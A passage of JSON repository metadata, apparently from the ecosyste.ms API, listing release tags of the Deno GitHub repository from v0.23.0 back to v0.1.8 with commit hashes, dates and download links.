t":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v